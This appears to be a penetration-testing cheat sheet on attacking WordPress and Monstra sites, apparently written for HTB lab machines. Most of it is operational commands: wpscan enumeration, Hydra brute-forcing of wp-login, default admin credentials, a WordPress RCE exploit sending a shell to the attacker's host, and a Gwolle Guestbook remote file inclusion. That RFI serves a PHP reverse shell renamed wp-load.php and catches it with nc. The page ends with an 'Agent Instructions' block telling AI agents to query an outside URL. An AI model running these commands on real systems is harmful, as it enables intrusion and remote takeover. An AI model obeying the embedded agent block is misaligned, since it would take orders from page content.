# Wordpress
## Investigate
```
https://$IP/webservices/wp
https://$IP/webservices/wp/wp-login.php
/wordpress/ ....suggests we have a very fertile ground for planting an attack. User access = shell.
/phpmyadmin/ ....suggests there is a database ready to plunder.
/info.php .....gives us Kernel, hostname and OS information immediately.
```
## wpscan
```
Wordpress Vuln Scanner
> wpscan --url $IP
> wpscan --url https://$IP --disable-tls-checks
Enum plugins
> wpscan --url http://$IP/webservices/wp/ --enumerate p
> wpscan --url http://$IP/webservices/wp -e ap --log wpscan.out ...ap=all plugs
Enum plugins/themes/users
> wpscan --url http://$IP/webservices/wp -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive --api-token GetYourOwnAPIKey 2>&1
Brute with known user: 'elliot'
> wpscan --url 192.168.50.102 -U elliot --passwords ./fsocity_uniq.dic
-----------------------
-----------------------
Monstra
https://$IP/webservices/monstra-3.0.4/
https://$IP/webservices/monstra-3.0.4/admin/
admin:admin ..default works!
Try to edit themes!
They are often php
Monstra > Extends > Themes
"Helloworld" > Save ..fails
System > Backup ..not created (not writeable)
Content > Files ..new directory (created)
Content > Files > File ..Fails
System > Settings > Maintenance Mode
..Save Fails
Hello ..Save Fails
-----------------------
-----------------------
searchsploit monstra
github monstra > Issues >
php code execution
Look for sqli or lfi
-----------------------
-----------------------
```
## Wordpress RCE Exploits
```
wordpress-rce-exploit.sh
wordpress-rce-exploit.py --python version
> sudo python ./wordpress-rce-exploit.py http://$IP/wp-login.php $MyIP:4444 admin
```
## wp curl trick
```
Tries to catch the 'enter new password link'
> curl -H "Host: $IP" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password" http://$IP/wp-login.php?action=lostpassword
```
## wp-support-plus-responsive-ticket-system
```
> wpscan --url https://$IP --disable-tls-checks
wp-support-plus-responsive-ticket-system
Version: 7.1.3
> searchsploit -x 41006.txt
Save as hello.html
Serve: python3 -m http.server
http://localhost/hello.html
Reload page - Now Admin!!
https://brainfuck.htb/?page_id=6
https://brainfuck.htp/wp-admin/admin-ajax.php
```
## Brute Force Username - [Hydra](/05-passwords-ciphers/hydra.md)
```
> hydra -vV -L users.dic -p wedontcare 192.168.50.102 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'
```
## Gwolle Guestbook RFI
* TartarsauceHTB
* Check your version:
*
* Basically:
* http\://$IP...ajaxresponse?abspath=**http\://$MyIP/**
* Place an evil 'wp-load.php' (actually reverse PHP) on your local web server
```
-------------------------
searchsploit gwolle
searchsploit -x 38861 ..read
Remote File Inclusion (RFI) - Found for 1.5.3
-------------------------
RFI:
http://$IP/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://$MyIP
-------------------------
Prep:
locate php-reverse
cp /usr/share/webshells/php/php-reverse-shell.php wp-load.php
vim wp-load.php
python -m SimpleHTTPServer 80
-------------------------
Exploit:
curl -s http://$IP/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://$MyIP/
(keep the trailing / or else this wont work)
nc -lvnp 7500
connected!
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://pentest.mxhx.org/04-webapps/03-webapp-wordpress.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.